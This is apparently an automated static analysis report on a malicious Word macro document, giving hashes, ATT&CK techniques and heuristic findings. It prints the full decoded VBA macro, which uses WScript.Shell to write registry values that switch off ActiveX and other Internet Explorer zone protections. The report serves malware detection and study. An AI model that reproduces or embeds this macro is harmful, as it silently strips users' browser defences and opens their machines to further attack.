Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 01a7096fa3e345ec…

MALICIOUS

Office (OLE)

Size: 26.5 KB
Created: 2000-12-30 18:12:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 7acb2a0a3a185b38df972a4a528ebab2
SHA-1: f2e8928317d7bcd1b339944a3f59b4ae6cab25f8
SHA-256: 01a7096fa3e345ec845451b5fa284d37facd49454668e1c73094a2ee1813ba16
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The VBA script uses WScript.Shell to write registry values that lower Internet Explorer's security settings for the local intranet and trusted sites zones. This is likely intended to bypass security warnings and facilitate the execution of malicious content or further exploitation. The script explicitly targets registry values such as HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\1\1405.

Heuristics (4)

  • VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage (critical) OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
    Set WSHShell = CreateObject("WScript.Shell")
    For i = 1 To 4
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
    Set WSHShell = CreateObject("WScript.Shell")
    For i = 1 To 4
  • Reference to Windows Script Host (high) SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1047 bytes
SHA-256: 4fe30b3bc177625d2baa1ace0d754953219c18ce161baeb2e696e47547774a6b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'this script was written by Edrin@gmx.net
MsgBox "Achtung, Active X Security of Internetexplorer off!!!"
Set WSHShell = CreateObject("WScript.Shell")
For i = 1 To 4
' To trun off localhost-protection(127.0.0.1): i = 0 ()
' Warning: You can´t reset this with options of internet explorer! you have to reset it in registry yourself!!!!!
key = "HKEY_CURRENT_USER\SOFTWARE\MICrosOFT\WINdows\CurrentVersION\Internet settings\Zones\" + chr(i + 48) + "\"
' Chr(49) -> 1 in ASCII
A1 = key + "1405"
A2 = key + "1201"
A3 = key + "1001"
A4 = key + "1004"
WSHShell.RegWrite A1, 0, "REG_DWORD"
WSHShell.RegWrite A2, 0, "REG_DWORD"
WSHShell.RegWrite A3, 0, "REG_DWORD"
WSHShell.RegWrite A4, 0, "REG_DWORD"
Next
MsgBox "Done"